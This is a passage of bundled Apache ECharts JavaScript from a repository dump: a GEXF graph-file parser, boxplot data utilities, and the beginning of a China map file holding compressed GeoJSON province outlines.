information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * This is a parse of GEXF.\n *\n * The spec of GEXF:\n * https://gephi.org/gexf/1.2draft/gexf-12draft-primer.pdf\n */\n\nfunction parse(xml) {\n    var doc;\n    if (typeof xml === 'string') {\n        var parser = new DOMParser();\n        doc = parser.parseFromString(xml, 'text/xml');\n    }\n    else {\n        doc = xml;\n    }\n    if (!doc || doc.getElementsByTagName('parsererror').length) {\n        return null;\n    }\n\n    var gexfRoot = getChildByTagName(doc, 'gexf');\n\n    if (!gexfRoot) {\n        return null;\n    }\n\n    var graphRoot = getChildByTagName(gexfRoot, 'graph');\n\n    var attributes = parseAttributes(getChildByTagName(graphRoot, 'attributes'));\n    var attributesMap = {};\n    for (var i = 0; i < attributes.length; i++) {\n        attributesMap[attributes[i].id] = attributes[i];\n    }\n\n    return {\n        nodes: parseNodes(getChildByTagName(graphRoot, 'nodes'), attributesMap),\n        links: parseEdges(getChildByTagName(graphRoot, 'edges'))\n    };\n}\n\nfunction parseAttributes(parent) {\n    return parent ? map(getChildrenByTagName(parent, 'attribute'), function (attribDom) {\n        return {\n            id: getAttr(attribDom, 'id'),\n            title: getAttr(attribDom, 'title'),\n            type: getAttr(attribDom, 'type')\n        };\n    }) : [];\n}\n\nfunction parseNodes(parent, attributesMap) {\n    return parent ? map(getChildrenByTagName(parent, 'node'), function (nodeDom) {\n\n        var id = getAttr(nodeDom, 'id');\n        var label = getAttr(nodeDom, 'label');\n\n        var node = {\n            id: id,\n            name: label,\n            itemStyle: {\n                normal: {}\n            }\n        };\n\n        var vizSizeDom = getChildByTagName(nodeDom, 'viz:size');\n        var vizPosDom = getChildByTagName(nodeDom, 'viz:position');\n        var vizColorDom = getChildByTagName(nodeDom, 'viz:color');\n        // var vizShapeDom = getChildByTagName(nodeDom, 'viz:shape');\n\n        var attvaluesDom = getChildByTagName(nodeDom, 'attvalues');\n\n        if (vizSizeDom) {\n            node.symbolSize = parseFloat(getAttr(vizSizeDom, 'value'));\n        }\n        if (vizPosDom) {\n            node.x = parseFloat(getAttr(vizPosDom, 'x'));\n            node.y = parseFloat(getAttr(vizPosDom, 'y'));\n            // z\n        }\n        if (vizColorDom) {\n            node.itemStyle.normal.color = 'rgb(' + [\n                getAttr(vizColorDom, 'r') | 0,\n                getAttr(vizColorDom, 'g') | 0,\n                getAttr(vizColorDom, 'b') | 0\n            ].join(',') + ')';\n        }\n        // if (vizShapeDom) {\n            // node.shape = getAttr(vizShapeDom, 'shape');\n        // }\n        if (attvaluesDom) {\n            var attvalueDomList = getChildrenByTagName(attvaluesDom, 'attvalue');\n\n            node.attributes = {};\n\n            for (var j = 0; j < attvalueDomList.length; j++) {\n                var attvalueDom = attvalueDomList[j];\n                var attId = getAttr(attvalueDom, 'for');\n                var attValue = getAttr(attvalueDom, 'value');\n                var attribute = attributesMap[attId];\n\n                if (attribute) {\n                    switch (attribute.type) {\n                        case 'integer':\n                        case 'long':\n                            attValue = parseInt(attValue, 10);\n                            break;\n                        case 'float':\n                        case 'double':\n                            attValue = parseFloat(attValue);\n                            break;\n                        case 'boolean':\n                            attValue = attValue.toLowerCase() === 'true';\n                            break;\n                        default:\n                    }\n                    node.attributes[attId] = attValue;\n                }\n            }\n        }\n\n        return node;\n    }) : [];\n}\n\nfunction parseEdges(parent) {\n    return parent ? map(getChildrenByTagName(parent, 'edge'), function (edgeDom) {\n        var id = getAttr(edgeDom, 'id');\n        var label = getAttr(edgeDom, 'label');\n\n        var sourceId = getAttr(edgeDom, 'source');\n        var targetId = getAttr(edgeDom, 'target');\n\n        var edge = {\n            id: id,\n            name: label,\n            source: sourceId,\n            target: targetId,\n            lineStyle: {\n                normal: {}\n            }\n        };\n\n        var lineStyle = edge.lineStyle.normal;\n\n        var vizThicknessDom = getChildByTagName(edgeDom, 'viz:thickness');\n        var vizColorDom = getChildByTagName(edgeDom, 'viz:color');\n        // var vizShapeDom = getChildByTagName(edgeDom, 'viz:shape');\n\n        if (vizThicknessDom) {\n            lineStyle.width = parseFloat(vizThicknessDom.getAttribute('value'));\n        }\n        if (vizColorDom) {\n            lineStyle.color = 'rgb(' + [\n                getAttr(vizColorDom, 'r') | 0,\n                getAttr(vizColorDom, 'g') | 0,\n                getAttr(vizColorDom, 'b') | 0\n            ].join(',') + ')';\n        }\n        // if (vizShapeDom) {\n        //     edge.shape = vizShapeDom.getAttribute('shape');\n        // }\n\n        return edge;\n    }) : [];\n}\n\nfunction getAttr(el, attrName) {\n    return el.getAttribute(attrName);\n}\n\nfunction getChildByTagName(parent, tagName) {\n    var node = parent.firstChild;\n\n    while (node) {\n        if (\n            node.nodeType !== 1\n            || node.nodeName.toLowerCase() !== tagName.toLowerCase()\n        ) {\n            node = node.nextSibling;\n        }\n        else {\n            return node;\n        }\n    }\n\n    return null;\n}\n\nfunction getChildrenByTagName(parent, tagName) {\n    var node = parent.firstChild;\n    var children = [];\n    while (node) {\n        if (node.nodeName.toLowerCase() === tagName.toLowerCase()) {\n            children.push(node);\n        }\n        node = node.nextSibling;\n    }\n\n    return children;\n}\n\n\nvar gexf = (Object.freeze || Object)({\n\tparse: parse\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/*\n* A third-party license is embeded for some of the code in this file:\n* The method \"quantile\" was copied from \"d3.js\".\n* (See more details in the comment of the method below.)\n* The use of the source code of this file is also subject to the terms\n* and consitions of the license of \"d3.js\" (BSD-3Clause, see\n* </licenses/LICENSE-d3>).\n*/\n\n/**\n * Linear mapping a value from domain to range\n * @memberOf module:echarts/util/number\n * @param  {(number|Array.<number>)} val\n * @param  {Array.<number>} domain Domain extent domain[0] can be bigger than domain[1]\n * @param  {Array.<number>} range  Range extent range[0] can be bigger than range[1]\n * @param  {boolean} clamp\n * @return {(number|Array.<number>}\n */\n\n\n/**\n * Convert a percent string to absolute number.\n * Returns NaN if percent is not a valid string or number\n * @memberOf module:echarts/util/number\n * @param {string|number} percent\n * @param {number} all\n * @return {number}\n */\n\n\n/**\n * (1) Fix rounding error of float numbers.\n * (2) Support return string to avoid scientific notation like '3.5e-7'.\n *\n * @param {number} x\n * @param {number} [precision]\n * @param {boolean} [returnStr]\n * @return {number|string}\n */\n\n\n/**\n * asc sort arr.\n * The input arr will be modified.\n *\n * @param {Array} arr\n * @return {Array} The input arr.\n */\nfunction asc(arr) {\n    arr.sort(function (a, b) {\n        return a - b;\n    });\n    return arr;\n}\n\n/**\n * Get precision\n * @param {number} val\n */\n\n\n/**\n * @param {string|number} val\n * @return {number}\n */\n\n\n/**\n * Minimal dicernible data precisioin according to a single pixel.\n *\n * @param {Array.<number>} dataExtent\n * @param {Array.<number>} pixelExtent\n * @return {number} precision\n */\n\n\n/**\n * Get a data of given precision, assuring the sum of percentages\n * in valueList is 1.\n * The largest remainer method is used.\n * https://en.wikipedia.org/wiki/Largest_remainder_method\n *\n * @param {Array.<number>} valueList a list of all data\n * @param {number} idx index of the data to be processed in valueList\n * @param {number} precision integer number showing digits of precision\n * @return {number} percent ranging from 0 to 100\n */\n\n\n// Number.MAX_SAFE_INTEGER, ie do not support.\n\n\n/**\n * To 0 - 2 * PI, considering negative radian.\n * @param {number} radian\n * @return {number}\n */\n\n\n/**\n * @param {type} radian\n * @return {boolean}\n */\n\n\n/* eslint-enable */\n\n/**\n * @param {string|Date|number} value These values can be accepted:\n *   + An instance of Date, represent a time in its own time zone.\n *   + Or string in a subset of ISO 8601, only including:\n *     + only year, month, date: '2012-03', '2012-03-01', '2012-03-01 05', '2012-03-01 05:06',\n *     + separated with T or space: '2012-03-01T12:22:33.123', '2012-03-01 12:22:33.123',\n *     + time zone: '2012-03-01T12:22:33Z', '2012-03-01T12:22:33+8000', '2012-03-01T12:22:33-05:00',\n *     all of which will be treated as local time if time zone is not specified\n *     (see <https://momentjs.com/>).\n *   + Or other string format, including (all of which will be treated as loacal time):\n *     '2012', '2012-3-1', '2012/3/1', '2012/03/01',\n *     '2009/6/12 2:00', '2009/6/12 2:05:08', '2009/6/12 2:05:08.123'\n *   + a timestamp, which represent a time in UTC.\n * @return {Date} date\n */\n\n\n/**\n * Quantity of a number. e.g. 0.1, 1, 10, 100\n *\n * @param  {number} val\n * @return {number}\n */\n\n\n/**\n * Exponent of the quantity of a number\n * e.g., 1234 equals to 1.234*10^3, so quantityExponent(1234) is 3\n *\n * @param  {number} val non-negative value\n * @return {number}\n */\n\n\n/**\n * find a “nice” number approximately equal to x. Round the number if round = true,\n * take ceiling if round = false. The primary observation is that the “nicest”\n * numbers in decimal are 1, 2, and 5, and all power-of-ten multiples of these numbers.\n *\n * See \"Nice Numbers for Graph Labels\" of Graphic Gems.\n *\n * @param  {number} val Non-negative value.\n * @param  {boolean} round\n * @return {number}\n */\n\n\n/**\n * This code was copied from \"d3.js\"\n * <https://github.com/d3/d3/blob/9cc9a875e636a1dcf36cc1e07bdf77e1ad6e2c74/src/arrays/quantile.js>.\n * See the license statement at the head of this file.\n * @param {Array.<number>} ascArr\n */\nfunction quantile(ascArr, p) {\n    var H = (ascArr.length - 1) * p + 1;\n    var h = Math.floor(H);\n    var v = +ascArr[h - 1];\n    var e = H - h;\n    return e ? v + e * (ascArr[h] - v) : v;\n}\n\n/**\n * Order intervals asc, and split them when overlap.\n * expect(numberUtil.reformIntervals([\n *     {interval: [18, 62], close: [1, 1]},\n *     {interval: [-Infinity, -70], close: [0, 0]},\n *     {interval: [-70, -26], close: [1, 1]},\n *     {interval: [-26, 18], close: [1, 1]},\n *     {interval: [62, 150], close: [1, 1]},\n *     {interval: [106, 150], close: [1, 1]},\n *     {interval: [150, Infinity], close: [0, 0]}\n * ])).toEqual([\n *     {interval: [-Infinity, -70], close: [0, 0]},\n *     {interval: [-70, -26], close: [1, 1]},\n *     {interval: [-26, 18], close: [0, 1]},\n *     {interval: [18, 62], close: [0, 1]},\n *     {interval: [62, 150], close: [0, 1]},\n *     {interval: [150, Infinity], close: [0, 0]}\n * ]);\n * @param {Array.<Object>} list, where `close` mean open or close\n *        of the interval, and Infinity can be used.\n * @return {Array.<Object>} The origin list, which has been reformed.\n */\n\n\n/**\n * parseFloat NaNs numeric-cast false positives (null|true|false|\"\")\n * ...but misinterprets leading-number strings, particularly hex literals (\"0x...\")\n * subtraction forces infinities to NaN\n *\n * @param {*} v\n * @return {boolean}\n */\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * See:\n *  <https://en.wikipedia.org/wiki/Box_plot#cite_note-frigge_hoaglin_iglewicz-2>\n *  <http://stat.ethz.ch/R-manual/R-devel/library/grDevices/html/boxplot.stats.html>\n *\n * Helper method for preparing data.\n *\n * @param {Array.<number>} rawData like\n *        [\n *            [12,232,443], (raw data set for the first box)\n *            [3843,5545,1232], (raw datat set for the second box)\n *            ...\n *        ]\n * @param {Object} [opt]\n *\n * @param {(number|string)} [opt.boundIQR=1.5] Data less than min bound is outlier.\n *      default 1.5, means Q1 - 1.5 * (Q3 - Q1).\n *      If 'none'/0 passed, min bound will not be used.\n * @param {(number|string)} [opt.layout='horizontal']\n *      Box plot layout, can be 'horizontal' or 'vertical'\n * @return {Object} {\n *      boxData: Array.<Array.<number>>\n *      outliers: Array.<Array.<number>>\n *      axisData: Array.<string>\n * }\n */\nvar prepareBoxplotData = function (rawData, opt) {\n    opt = opt || [];\n    var boxData = [];\n    var outliers = [];\n    var axisData = [];\n    var boundIQR = opt.boundIQR;\n    var useExtreme = boundIQR === 'none' || boundIQR === 0;\n\n    for (var i = 0; i < rawData.length; i++) {\n        axisData.push(i + '');\n        var ascList = asc(rawData[i].slice());\n\n        var Q1 = quantile(ascList, 0.25);\n        var Q2 = quantile(ascList, 0.5);\n        var Q3 = quantile(ascList, 0.75);\n        var min = ascList[0];\n        var max = ascList[ascList.length - 1];\n\n        var bound = (boundIQR == null ? 1.5 : boundIQR) * (Q3 - Q1);\n\n        var low = useExtreme\n            ? min\n            : Math.max(min, Q1 - bound);\n        var high = useExtreme\n            ? max\n            : Math.min(max, Q3 + bound);\n\n        boxData.push([low, Q1, Q2, Q3, high]);\n\n        for (var j = 0; j < ascList.length; j++) {\n            var dataItem = ascList[j];\n            if (dataItem < low || dataItem > high) {\n                var outlier = [i, dataItem];\n                opt.layout === 'vertical' && outlier.reverse();\n                outliers.push(outlier);\n            }\n        }\n    }\n    return {\n        boxData: boxData,\n        outliers: outliers,\n        axisData: axisData\n    };\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar version = '1.0.0';\n\n// For backward compatibility, where the namespace `dataTool` will\n// be mounted on `echarts` is the extension `dataTool` is imported.\n// But the old version of echarts do not have `dataTool` namespace,\n// so check it before mounting.\nif (echarts.dataTool) {\n    echarts.dataTool.version = version;\n    echarts.dataTool.gexf = gexf;\n    echarts.dataTool.prepareBoxplotData = prepareBoxplotData;\n}\n\nexports.version = version;\nexports.gexf = gexf;\nexports.prepareBoxplotData = prepareBoxplotData;\n\n})));\n//# sourceMappingURL=dataTool.js.map\n"
  },
  {
    "path": "flask/static/js/echarts/map/js/china.js",
    "content": "/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n(function (root, factory) {\n    if (typeof define === 'function' && define.amd) {\n        // AMD. Register as an anonymous module.\n        define(['exports', 'echarts'], factory);\n    } else if (typeof exports === 'object' && typeof exports.nodeName !== 'string') {\n        // CommonJS\n        factory(exports, require('echarts'));\n    } else {\n        // Browser globals\n        factory({}, root.echarts);\n    }\n}(this, function (exports, echarts) {\n    var log = function (msg) {\n        if (typeof console !== 'undefined') {\n            console && console.error && console.error(msg);\n        }\n    }\n    if (!echarts) {\n        log('ECharts is not Loaded');\n        return;\n    }\n    if (!echarts.registerMap) {\n        log('ECharts Map is not loaded')\n        return;\n    }\n    echarts.registerMap('china', {\"type\":\"FeatureCollection\",\"features\":[{\"type\":\"Feature\",\"id\":\"710000\",\"properties\":{\"id\":\"710000\",\"cp\":[121.509062,24.044332],\"name\":\"台湾\",\"childNum\":6},\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@°Ü¯Û\"],[\"@@ƛĴÕƊÉɼģºðʀ\\\\ƎsÆNŌÔĚänÜƤɊĂǀĆĴĤǊŨxĚĮǂƺòƌâÔ®ĮXŦţƸZûÐƕƑGđ¨ĭMó·ęcëƝɉlÝƯֹÅŃ^Ó·śŃǋƏďíåɛGɉ¿@ăƑ¥ĘWǬÏĶŁâ\"],[\"@@\\\\p|WoYG¿¥Ij@¢\"],[\"@@¡@V^RqBbAnTXeRz¤L«³I\"],[\"@@ÆEEkWqë @\"],[\"@@fced\"],[\"@@¯ɜÄèaì¯ØǓIġĽ\"],[\"@@çûĖëĄhòř \"]],\"encodeOffsets\":[[[122886,24033]],[[123335,22980]],[[122375,24193]],[[122518,24117]],[[124427,22618]],[[124862,26043]],[[126259,26318]],[[127671,26683]]]}},{\"type\":\"Feature\",\"id\":\"130000\",\"properties\":{\"id\":\"130000\",\"cp\":[114.502461,38.045474],\"name\":\"河北\",\"childNum\":3},\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@o~Z]ªrºc_ħ²G¼s`jÎŸnüsÂłNX_M`Ç½ÓnUKĜēs¤­©yrý§uģcJe\"],[\"@@U`Ts¿mÂ\"],[\"@@oºƋÄdeVDJj£J|ÅdzÂFt~KŨ¸IÆv|¢r}èonb}`RÎÄn°ÒdÞ²^®lnÐèĄlðÓ×]ªÆ}LiĂ±Ö`^°Ç¶p®đDcŋ`ZÔ¶êqvFÆN®ĆTH®¦O¾IbÐã´BĐɢŴÆíȦpĐÞXR·nndO¤OÀĈƒ­QgµFo|gȒęSWb©osx|hYhgŃfmÖĩnºTÌSp¢dYĤ¶UĈjlǐpäìë|³kÛfw²Xjz~ÂqbTÑěŨ@|oMzv¢ZrÃVw¬ŧĖ¸f°ÐTªqs{S¯r æÝlNd®²Ğ ǆiGĘJ¼lr}~K¨ŸƐÌWöÆzR¤lêmĞLÎ@¡|q]SvKÑcwpÏÏĿćènĪWlĄkT}J¤~ÈTdpddʾĬBVtEÀ¢ôPĎƗè@~kü\\\\rÊĔÖæW_§¼F´©òDòjYÈrbĞāøŀG{ƀ|¦ðrb|ÀH`pʞkvGpuARhÞÆǶgĘTǼƹS£¨¡ù³ŘÍ]¿ÂyôEP xX¶¹ÜO¡gÚ¡IwÃé¦ÅBÏ|Ç°N«úmH¯âDùyŜŲIÄuĐ¨D¸dɂFOhđ©OiÃ`ww^ÌkÑH«ƇǤŗĺtFu{Z}Ö@U´ʚLg®¯Oı°Ãw ^VbÉsmAê]]w§RRl£ȭµu¯b{ÍDěïÿȧuT£ġěŗƃĝQ¨fVƋƅn­a@³@ďyÃ½IĹÊKŭfċŰóxV@tƯJ]eR¾fe|rHA|h~Ėƍl§ÏlTíb ØoÅbbx³^zÃĶ¶Sj®AyÂhðk`«PËµEFÛ¬Y¨Ļrõqi¼Wi°§Ð±´°^[À|ĠO@ÆxO\\\\ta\\\\tĕtû{ġȧXýĪÓjùÎRb^ÎfK[ÝděYfíÙTyuUSyŌŏů@Oi½éŅ­aVcř§ax¹XŻácWU£ôãºQ¨÷Ñws¥qEHÙ|šYQoŕÇyáĂ£MÃ°oťÊP¡mWO¡v{ôvîēÜISpÌhp¨ jdeŔQÖjX³àĈ[n`Yp@UcM`RKhEbpŞlNut®EtqnsÁgAiúoHqCXhfgu~ÏWP½¢G^}¯ÅīGCÑ^ãziMáļMTÃƘrMc|O_¯Ŏ´|morDkO\\\\mĆJfl@cĢ¬¢aĦtRıÒ¾ùƀ^juųœK­UFyƝīÛ÷ąV×qƥV¿aȉd³BqPBmaËđŻģmÅ®V¹d^KKonYg¯XhqaLdu¥Ípǅ¡KąÅkĝęěhq}HyÃ]¹ǧ£Í÷¿qáµ§g¤o^á¾ZE¤i`ĳ{nOl»WÝĔįhgF[¿¡ßkOüš_ūiǱàUtėGyl}ÓM}jpEC~¡FtoQiHkk{Ãmï\"]],\"encodeOffsets\":[[[119712,40641]],[[121616,39981]],[[116462,37237]]]}},{\"type\":\"Feature\",\"id\":\"140000\",\"properties\":{\"id\":\"140000\",\"cp\":[111.849248,36.857014],\"name\":\"山西\",\"childNum\":1},\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ÞĩÒSra}ÁyWix±Üe´lèßÓǏokćiµVZģ¡coTSË¹ĪmnÕńehZg{gtwªpXaĚThȑp{¶Eh®RćƑP¿£Pmc¸mQÝWďȥoÅîɡųAďä³aÏJ½¥PG­ąSM­EÅruµéYÓŌ_dĒCo­Èµ]¯_²ÕjāK~©ÅØ^ÔkïçămÏk]­±cÝ¯ÑÃmQÍ~_apm~ç¡qu{JÅŧ·Ls}EyÁÆcI{¤IiCfUcƌÃp§]ě«vD@¡SÀµMÅwuYY¡DbÑc¡h×]nkoQdaMç~eDÛtT©±@¥ù@É¡ZcW|WqOJmĩl«ħşvOÓ«IqăV¥D[mI~Ó¢cehiÍ]Ɠ~ĥqX·eƷn±}v[ěďŕ]_œ`¹§ÕōIo©b­s^}Ét±ū«³p£ÿ·Wµ|¡¥ăFÏs×¥ŅxÊdÒ{ºvĴÎêÌɊ²¶ü¨|ÞƸµȲLLúÉƎ¤ϊęĔV`_bªS^|dzY|dz¥pZbÆ£¶ÒK}tĦÔņƠPYznÍvX¶Ěn ĠÔzý¦ª÷ÑĸÙUȌ¸dòÜJð´ìúNM¬XZ´¤ŊǸ_tldI{¦ƀðĠȤ¥NehXnYGR° ƬDj¬¸|CĞKqºfƐiĺ©ª~ĆOQª ¤@ìǦɌ²æBÊTŸʂōĖĴŞȀÆÿȄlŤĒötÎ½î¼ĨXh|ªM¤Ðz\"],\"encodeOffsets\":[[116874,41716]]}},{\"type\":\"Feature\",\"id\":\"150000\",\"properties\":{\"id\":\"150000\",\"cp\":[111.670801,41.818311],\"name\":\"内蒙古\",\"childNum\":2},\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@¯PqFB|S³C|kñHdiÄ¥sŉÅPóÑÑE^ÅPpy_YtShQ·aHwsOnŉÃs©iqjUSiº]ïW«gW¡ARë¥_sgÁnUI«m]jvV¼euhwqAaW_µj»çjioQR¹ēÃßt@r³[ÛlćË^ÍÉáGOUÛOB±XkÅ¹£k|e]olkVÍ¼ÕqtaÏõjgÁ£§U^RLËnX°ÇBz^~wfvypV ¯ƫĉ˭ȫƗŷɿÿĿƑ˃ĝÿÃǃßËőó©ǐȍŒĖM×ÍEyxþp]ÉvïèvƀnÂĴÖ@V~Ĉv¦wĖtējyÄDXÄxGQuv_i¦aBçw˛wD©{tāmQ{EJ§KPśƘƿ¥@sCTÉ}ɃwƇy±gÑ}T[÷kÐç¦«SÒ¥¸ëBX½HáÅµÀğtSÝÂa[ƣ°¯¦Pï¡]£ġÒk®G²èQ°óMq}EóƐÇ\\\\@áügQÍu¥FTÕ¿Jû]|mvāÎYua^WoÀa·­ząÒot×¶CLƗi¯¤mƎHǊ¤îìɾŊìTdåwsRÖgĒųúÍġäÕ}Q¶¿A[¡{d×uQAMxVvMOmăl«ct[wº_ÇÊjbÂ£ĦS_éQZ_lwgOiýe`YYLq§IÁǳ£ÙË[ÕªuƏ³ÍTs·bÁĽäė[b[ŗfãcn¥îC¿÷µ[ŏÀQ­ōĉm¿Á^£mJVmL[{Ï_£F¥Ö{ŹA}×Wu©ÅaųĳƳhB{·TQqÙIķËZđ©Yc|M¡LeVUóK_QWk_ĥ¿ãZ»X\\\\ĴuUèlG®ěłTĠğDŃOrÍdÆÍz]±ŭ©Å]ÅÐ}UË¥©TċïxgckfWgi\\\\ÏĒ¥HkµEë{»ÏetcG±ahUiñiWsɁ·cCÕk]wȑ|ća}wVaĚá G°ùnM¬¯{ÈÐÆA¥ÄêJxÙ¢hP¢ÛºµwWOóFÁz^ÀŗÎú´§¢T¤ǻƺSėǵhÝÅQgvBHouʝl_o¿Ga{ïq{¥|ſĿHĂ÷aĝÇqZñiñC³ª»E`¨åXēÕqÉû[l}ç@čƘóO¿¡FUsAʽīccocÇS}£IS~ălkĩXçmĈŀÐoÐdxÒuL^T{r@¢ÍĝKén£kQyÅõËXŷƏL§~}kq»IHėǅjĝ»ÑÞoå°qTt|r©ÏS¯·eŨĕx«È[eM¿yupN~¹ÏyN£{©għWí»Í¾səšǅ_ÃĀɗ±ąĳĉʍŌŷSÉA±åǥɋ@ë£R©ąP©}ĹªƏj¹erLDĝ·{i«ƫC£µsKCGS|úþXgp{ÁX¿ć{ƱȏñZáĔyoÁhA}ŅĆfdŉ_¹Y°ėǩÑ¡H¯¶oMQqð¡Ë|Ñ`ƭŁX½·óÛxğįÅcQs«tȋǅFù^it«Č¯[hAi©á¥ÇĚ×l|¹y¯YȵƓñǙµïċĻ|Düȭ¶¡oŽäÕG\\\\ÄT¿Òõr¯LguÏYęRƩɷŌO\\\\İÐ¢æ^Ŋ ĲȶȆbÜGĝ¬¿ĚVĎgª^íu½jÿĕęjık@Ľ]ėl¥ËĭûÁėéV©±ćn©­ȇÍq¯½YÃÔŉÉNÑÅÝy¹NqáʅDǡËñ­ƁYÅy̱os§ȋµʽǘǏƬɱàưN¢ƔÊuľýľώȪƺɂļxZĈ}ÌŉŪĺœĭFЛĽ̅ȣͽÒŵìƩÇϋÿȮǡŏçƑůĕ~Ç¼ȳÐUfdIxÿ\\\\G zâɏÙOº·pqy£@qþ@Ǟ˽IBäƣzsÂZÁàĻdñ°ŕzéØűzșCìDȐĴĺf®Àľưø@ɜÖÞKĊŇƄ§͑těï͡VAġÑÑ»d³öǍÝXĉĕÖ{þĉu¸ËʅğU̎éhɹƆ̗̮ȘǊ֥ड़ࡰţાíϲäʮW¬®ҌeרūȠkɬɻ̼ãüfƠSצɩςåȈHϚÎKǳͲOðÏȆƘ¼CϚǚ࢚˼ФÔ¤ƌĞ̪Qʤ´¼mȠJˀƲÀɠmǐnǔĎȆÞǠN~ʢĜ¶ƌĆĘźʆȬ˪ĚĒ¸ĞGȖƴƀj`ĢçĶāàŃºēĢĖćYÀŎüôQÐÂŎŞǆŞêƖoˆDĤÕºÑǘÛˤ³̀gńƘĔÀ^ªƂ`ªt¾äƚêĦĀ¼ÐĔǎ¨Ȕ»͠^ˮÊȦƤøxRrŜH¤¸ÂxDÄ|ø˂˜ƮÐ¬ɚwɲFjĔ²Äw°ǆdÀÉ_ĸdîàŎjÊêTĞªŌŜWÈ|tqĢUB~´°ÎFCU¼pĀēƄN¦¾O¶łKĊOjĚj´ĜYp{¦SĚÍ\\\\T×ªV÷Ší¨ÅDK°ßtŇĔK¨ǵÂcḷ̌ĚǣȄĽFlġUĵŇȣFʉɁMğįʏƶɷØŭOǽ«ƽū¹Ʊő̝Ȩ§ȞʘĖiɜɶʦ}¨֪ࠜ̀ƇǬ¹ǨE˦ĥªÔêFxúQEr´Wrh¤Ɛ \\\\talĈDJÜ|[Pll̚¸ƎGú´P¬W¦^¦H]prRn|or¾wLVnÇIujkmon£cX^Bh`¥V¦U¤¸}xRj[^xN[~ªxQ[`ªHÆÂExx^wN¶Ê|¨ìMrdYpoRzNyÀDs~bcfÌ`L¾n|¾T°c¨È¢ar¤`[|òDŞĔöxElÖdHÀI`Ď\\\\Àì~ÆR¼tf¦^¢ķ¶eÐÚMptgjɡČÅyġLûŇV®ÄÈƀĎ°P|ªVVªj¬ĚÒêp¬E|ŬÂc|ÀtƐK f{ĘFĒƌXƲąo½Ę\\\\¥o}Ûu£ç­kX{uĩ«āíÓUŅßŢqŤ¥lyň[oi{¦LńðFȪȖĒL¿Ìf£K£ʺoqNwğc`uetOj×°KJ±qÆġmĚŗos¬qehqsuH{¸kH¡ÊRǪÇƌbȆ¢´äÜ¢NìÉʖ¦â©Ġu¦öČ^â£ĂhĖMÈÄw\\\\fŦ°W ¢¾luŸDw\\\\̀ʉÌÛMĀ[bÓEn}¶Vcês\"]],\"encodeOffsets\":[[[129102,52189]]]}},{\"type\":\"Feature\",\"id\":\"210000\",\"properties\":{\"id\":\"210000\",\"cp\":[123.429096,41.796767],\"name\":\"辽宁\",\"childNum\":16},\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@L@@sa\"],[\"@@MnNm\"],[\"@@dc\"],[\"@@eÀC@b\"],[\"@@fXwkbrÄ`qg\"],[\"@@^jtWQ\"],[\"@@~ Y]c\"],[\"@@G`ĔN^_¿ZÃM\"],[\"@@iX¶BY\"],[\"@@YZ\"],[\"@@L_{Epf\"],[\"@@^WqCT\\\\\"],[\"@@\\\\[§t|¤_\"],[\"@@m`n_\"],[\"@@Ïxǌ{q_×^Giip\"],[\"@@@é^BntaÊU]x ¯ÄPĲ­°hʙK³VÕ@Y~|EvĹsÇ¦­L^pÃ²ŸÒG 